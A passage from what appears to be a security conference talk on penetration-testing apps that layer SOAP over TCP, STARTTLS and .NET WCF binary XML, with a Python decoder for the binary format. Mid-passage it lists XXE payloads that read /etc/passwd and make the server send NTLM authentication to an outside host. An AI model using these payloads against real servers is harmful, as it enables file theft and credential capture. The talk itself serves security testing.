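        while self.p < len(self.d) and 0x04 <= self.d[self.p] <= 0x3F:
            t = self._u8()
            if t == 0x04: out += f" {self._str()}={quoteattr(self._text(self._u8()))}"                 # ShortAttribute
            elif t == 0x05: out += f" {self._str()}:{self._str()}={quoteattr(self._text(self._u8()))}" # Attribute
            elif t == 0x08: out += f" xmlns={quoteattr(self._str())}"                                    # ShortXmlnsAttribute
            elif t == 0x09: out += f" xmlns:{self._str()}={quoteattr(self._str())}"                     # XmlnsAttribute
            elif t == 0x0A: out += f" xmlns={quoteattr(self._dict())}"                                   # ShortDictionaryXmlnsAttribute
            elif t == 0x0B: out += f" xmlns:{self._str()}={quoteattr(self._dict())}"                    # DictionaryXmlnsAttribute
            elif 0x26 <= t <= 0x3F:                                                                       # PrefixAttributeA-Z
                out += f" {chr(0x61 + t - 0x26)}:{self._str()}={quoteattr(self._text(self._u8()))}"
            else:
                raise ValueError(f"unsupported attribute record 0x{t:02x} at offset {self.p - 1}")
        return out

    def decode(self) -> str:
        out, stack = [], []
        while self.p < len(self.d):
            t = self._u8()
            if t == 0x01:                                   # EndElement
                out.append(f"</{stack.pop()}>")
            elif 0x40 <= t <= 0x77:                         # any element record
                name = self._element_name(t)
                stack.append(name)
                out.append(f"<{name}{self._attributes()}>")
            elif 0x80 <= t <= 0xBD:                         # text record; odd type = ...WithEndElement
                out.append(escape(self._text(t & ~1)))
                if t & 1:
                    out.append(f"</{stack.pop()}>")
            else:
                raise ValueError(f"unsupported record 0x{t:02x} at offset {self.p - 1}")
        if stack:
            raise ValueError(f"truncated message, still open: {stack}")
        return "".join(out)


# The 89 bytes from the hexdump above (python-wcfbin's encoding of the GetStockPrice envelope).
CAPTURED = bytes.fromhex(
    "43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01"
    "6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61"
    "6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01"
    "43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63"
    "6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d"
    "65 9f 03 18 e3 86 01 01 01")


def decode_wcf(data: bytes) -> str:
    return NbfxDecoder(data).decode()


if __name__ == "__main__":
    print(decode_wcf(CAPTURED))
```

Two things worth noticing in the output: `GOOG` came back because the encoder stored it as a Bytes8Text record (its bytes happen to be valid Base64, so the XML text is the Base64 form), and nothing in the byte stream carried a DOCTYPE, which is why the XXE payloads further down have to be smuggled as text the receiving side parses again as XML. Session-dictionary strings (odd IDs) are negotiated in the .NET Message Framing handshake; a relay that wants to decode real sessions has to track that exchange, not just the individual messages.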
Attack flow – tnSOAP: Threat actor → Intercept TCP connection (hardware + socat) → MiTM on START-TLS (mitm_relay) → Decapsulate WCF (python-wcfbin + few fixes) → Tamper with parameters → Crown jewels
• <!ENTITY xxe SYSTEM "file:///etc/passwd">
• XXE OOB over FTP
• <!ENTITY abc SYSTEM "file://securing.biz:445/">
The second entity makes the server open an SMB connection to a host the tester controls, and that connection carries the server's NTLM authentication (details in the link below).
TCP -> START TLS -> WCF -> XML -> XXE -> NTLM
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
Attack flow – tnSOAP: Threat actor → Intercept TCP connection (hardware + socat) → MiTM on START-TLS (mitm_relay) → Decapsulate WCF (python-wcfbin + few fixes) → Tamper with parameters → Increased attack surface
Processes
• Not a surprise that there are vulnerabilities
• Let’s talk about corporate processes:
  • How are penetration tests organised?
  • During which phase do you realise it’s an inception app?
  • What is the cost of implementing inception?
  • What is the security advantage of inception?
  • What is the cost of testing an inception app?
  • How to optimise it?
Summary
Protection against what?
The layers above protect against sniffing, Man-in-The-Middle and malware.
They do not protect against SQL Injection, cross-user access control or business logic flaws, and they make those harder to test for.
Thank you!
Twitter: @j_kaluzny
Jakub.Kaluzny@securing.biz